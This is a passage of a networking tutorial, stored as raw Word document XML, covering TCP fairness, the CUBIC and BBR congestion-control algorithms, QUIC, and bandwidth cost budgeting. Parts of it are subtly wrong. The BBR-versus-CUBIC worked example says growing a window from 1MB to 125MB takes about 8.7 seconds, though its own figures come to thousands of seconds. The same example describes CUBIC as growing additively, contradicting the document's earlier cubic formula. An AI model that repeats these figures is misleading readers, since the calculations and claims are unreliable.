        <w:t>They converge toward equal bandwidth allocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD28B2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>This is TCP's </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>self-organizing fairness</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — no central coordinator needed. Flows autonomously converge to approximately equal bandwidth sharing through the AIMD feedback mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629EFC72" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The unfairness in practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08477BB5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>AIMD provides equal bandwidth per TCP </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t>, not per </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t>. An HTTP/1.1 browser opening 6 connections gets 6× the bandwidth of an application using 1 connection. HTTP/2's single-connection model is actually a </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bandwidth disadvantage</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> in this regard — the HTTP/2 client gets 1 connection's worth of bandwidth while HTTP/1.1 browsers get 6. This is one reason CDNs and browser HTTP/2 implementations use connection coalescing carefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39617D83" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modern Congestion Control Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C18CB40" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CUBIC (default in Linux since kernel 2.6.19):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3A4D17" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>CUBIC replaces the linear AIMD growth with a cubic function of time since the last loss event. After a loss, cwnd reduction is the same as AIMD. But the recovery growth follows a cubic curve — fast initial growth, then slower near the previous maximum (the point of last loss, where the network is likely near capacity), then accelerating past it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAC2220" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA61D5B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>cwnd(t) = C × (t - K)³ + W_max</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C13674" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="6952C67F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>t = time since last loss event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2795E57B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>K = time to reach W_max = (W_max × β / C)^(1/3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C917660" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>W_max = cwnd at the time of last loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337720C9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>C = cubic scaling factor (0.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3185AC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>β = multiplicative decrease factor (0.7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E222B4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>CUBIC is more aggressive than classic AIMD on high-bandwidth-delay-product paths — it recovers faster from loss events. On 10Gbps+ links, CUBIC significantly outperforms classic TCP Reno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A19C1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BBR (Bottleneck Bandwidth and RTT) — Google's Model-Based Algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039AA3BC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BBR (Bottleneck Bandwidth and RTT) fundamentally rejects the loss-based congestion detection paradigm of AIMD/CUBIC. BBR's core insight: </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">packet loss is a lagging indicator </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>of congestion</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t>. By the time packets are being dropped, the network's buffers are full, and latency has already increased significantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8813A0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BBR models the network path as having two properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2565C109" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bottleneck Bandwidth (BtlBw):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> The maximum rate the bottleneck link can deliver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB3CED" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Round-Trip Propagation Time (RTprop):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> The minimum RTT when no queuing delay is present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D34F5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BBR continuously estimates these two parameters and sets its sending rate to BtlBw while keeping in-flight data to BtlBw × RTprop (the BDP). This keeps the pipe full without building queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F53AD9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BBR vs CUBIC on long-haul paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DF783E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6514B218" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>10Gbps link, 100ms RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66013F2C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BDP = 10Gbps × 0.1s = 1Gb = 125MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E16FDF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="5B8DA5A3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>CUBIC: grows cwnd additively after loss. On 10Gbps link, loss-based growth is agonizingly slow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64184012" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  cwnd grows by MSS (1460 bytes) per RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115ED4EC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Time to grow from 1MB to 125MB: (125MB-1MB)/1460 × 100ms ≈ 8.7 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1B282A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  During this 8.7 seconds, the 10Gbps link is severely underutilized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E0C991" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="34A1B8B0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BBR: estimates BtlBw=10Gbps and RTprop=100ms directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B36F8E7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Sets sending rate to 10Gbps immediately (within a few RTTs of probing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F77BE7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Achieves near-full link utilization orders of magnitude faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F59196C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BBR's practical impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3831092B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Google deployed BBR on YouTube's serving infrastructure in 2016. Results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3994A8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>4% median throughput improvement globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5808C94C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>14% improvement in the Americas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641F4166" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>75% improvement in Japan</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (high BDP paths — long distance + high bandwidth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1CC943" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Significant latency reduction (BBR avoids buffer bloat by not overfilling queues).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5161D5B2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BBR is now available in Linux kernel 4.9+ and used by Google, Cloudflare, and many CDN operators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314FFD02" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BBR's fairness problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> BBR flows are not always fair to CUBIC flows sharing a link. BBR can be more aggressive in probing bandwidth, potentially starving CUBIC flows. This is an active area of research — BBRv2 and BBRv3 improve fairness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AA0C6B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QUIC's congestion control advantage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB44C7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>QUIC implements congestion control in </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user space</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (unlike TCP which is in the kernel). This enables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477A7350" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-deployment tuning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Different services can use different congestion control algorithms. A video streaming service might use BBR; a bulk data transfer might use CUBIC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA6A8EB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Faster iteration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> New algorithms can be deployed via software update, not kernel upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AB0593" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Experiment infrastructure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> A/B testing congestion control algorithms on live traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7701E02B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="1C102147">
          <v:rect id="_x0000_i4472" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01D6EC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Bandwidth at the Application Layer — The Real Engineering Problems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479ED49B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Bandwidth Budget Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F12FB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Every application must operate within a </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bandwidth budget</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — the amount of data it can send/receive given cost, infrastructure, and user experience constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B97E466" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Calculating bandwidth requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D220642" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D56C659" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Video streaming service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35044343" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  1080p H.264 stream: 8 Mbps per viewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F952FC9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  4K H.265 stream: 15 Mbps per viewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1957390B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  1 million concurrent viewers (1M × 8 Mbps) = 8 Tbps outbound bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42341AC3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F3746B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  CDN egress cost (AWS CloudFront): ~$0.085/GB for first 10TB/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC614F3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Monthly data volume: 8 Tbps × (3600 × 24 × 30) seconds × 0.125 GB/Gb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031E6D39" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">                     = 8 Tbps × 2,592,000 seconds × 0.125</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4150C700" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">                     = 2,592,000 TB = 2.592 EB per month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF13AF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D2F266" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  This is why Netflix/YouTube spend hundreds of millions on CDN and own their own infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA9F405" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The bandwidth cost curve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060329CE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bandwidth pricing is highly non-linear with scale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426769FA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retail ISP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> $0.05–$0.15/GB egress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145960C2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cloud providers (AWS/GCP/Azure):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> $0.08–$0.09/GB (first 10TB), declining with volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E1AA26" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Colocation with transit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> $0.01–$0.05/Gbps/month for 10Gbps committed + $0.005/GB for burst.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43494C12" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tier 1 ISP transit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> $0.50–$2.00/Mbps/month (committed bandwidth, no per-GB charge).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF82754" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Peering (settlement-free):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> $0 — both parties mutually benefit from exchanging traffic.</w:t>
      </w:r>
    </w:p>
